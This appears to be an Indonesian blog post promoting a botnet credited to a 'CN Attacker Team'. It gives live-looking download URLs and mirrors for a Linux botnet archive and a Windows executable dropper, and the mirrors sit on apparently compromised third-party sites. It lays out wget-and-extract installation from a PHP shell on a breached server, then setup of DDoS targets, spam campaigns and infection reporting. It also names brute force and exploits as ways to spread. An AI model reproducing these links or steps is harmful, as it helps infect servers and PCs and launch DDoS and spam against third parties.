botnet download url :
http://www.teksan-tekstroy.com/.../.data.tgz (untuk infeksi server 2 keluarga nix)
versi mutant (untuk infeksi windows) :
http://www.magicmodems.net/asian_scandal.exe -> upload ke folder yg sama dg botnet linux
mirror 1: http://teksan-tekstroy.com/.../.data.tgz
mirror 2: http://www.capitaoarce.com.br/media/.data.tgz
Baru-baru ini telah direlease sebuah botnet versi beta oleh Kelompok Attacker dari RRC yang mengatas namakan diri mereka CN Attacker Team (kata mereka di blognya sih masih versi beta).
botnet cn attacker team ini memiliki fungsi2 sbb:
- prolonged ddos ( ddos untuk jangka panjang )
- fungsi untuk para spammer (botnet akan mencari alamat2 email dari 24 search engine untuk dikirimkan pesan spam yang sudah diset oleh spammer)
- dan fungsi harvest server (tiap infeksi akan dilaporkan ke email master yang sudah diset)
Ok kali ini saya akan membahas tentang botnet yang dibuat oleh tim cn attacker dari RRC , botnet ini dibagi 2, yang 1 bertujuan menginfeksi server2 dengan linux / free bsd
dan ada juga versi mutantnya untuk menginfeksi pc 2 dengan os ms windows (blindows).
botnet ini bisa diinstall melalui cpanel / php shell / ssh di server 2 linux yang telah kita susupi.
0. METODE SPREAD BOTNET
ssh, ftp brutus, exploit, web apps , dll
1. INSTALASI
untuk menginstallnya sangat2 mudah sekali, dari php shell misal kita download dulu :
wget http://teksan-tekstroy.com/.../.data.tgz
tar zxvf .data.tgz
setelah itu botnet dan file2nya akan ada di direktori dengan nama .backups, misal alamat php shell di :
http://www.raucherhimmel.de/images/nama_php_shell.php
maka lokasi setup botnet di :
http://www.raucherhimmel.de/images/.backups/
2. SETTING TARGET DOMAIN UNTUK DDOS
setiap kali dipasang botnet ini akan otomatis melakukan ddos, misalnya kita setting untuk melakukan dns attack ke suatu domain:
3. SETTING PESAN SPAM UNTUK SPAMMER
lalu isikan subjek dan pesan spam yang akan kita kirimkan, lalu begitu dirun botnet akan otomatis mencari alamat2 email dari 24 search engine
4. SETTING EMAIL MASTER
fungsi ini kadang mengandung bug , digunakan untuk melaporkan infeksi ke email Anda.
TENTANG VERSI MUTANT DARI BOTNET
versi mutant dari botnet digunakan untuk menginfeksi pc 2 windows dan membantu penyebaran botnet linux. agar versi mutant ini terkirim dalam bentuk attachment , silahkan
upload versi mutant dari botnet ini ke folder yang sama dg folder botnet linux di .backups
botnet download url :
http://mommygrads.com/libraries/.data.tgz
versi mutant (untuk infeksi windows) :
http://www.magicmodems.net/asian_scandal.exe -> upload ke folder yg sama dg botnet linux
mirror 1: http://teksan-tekstroy.com/.../.data.tgz
mirror 2: http://www.sowiesoft.com/.../.data.tgz
Posting Komentar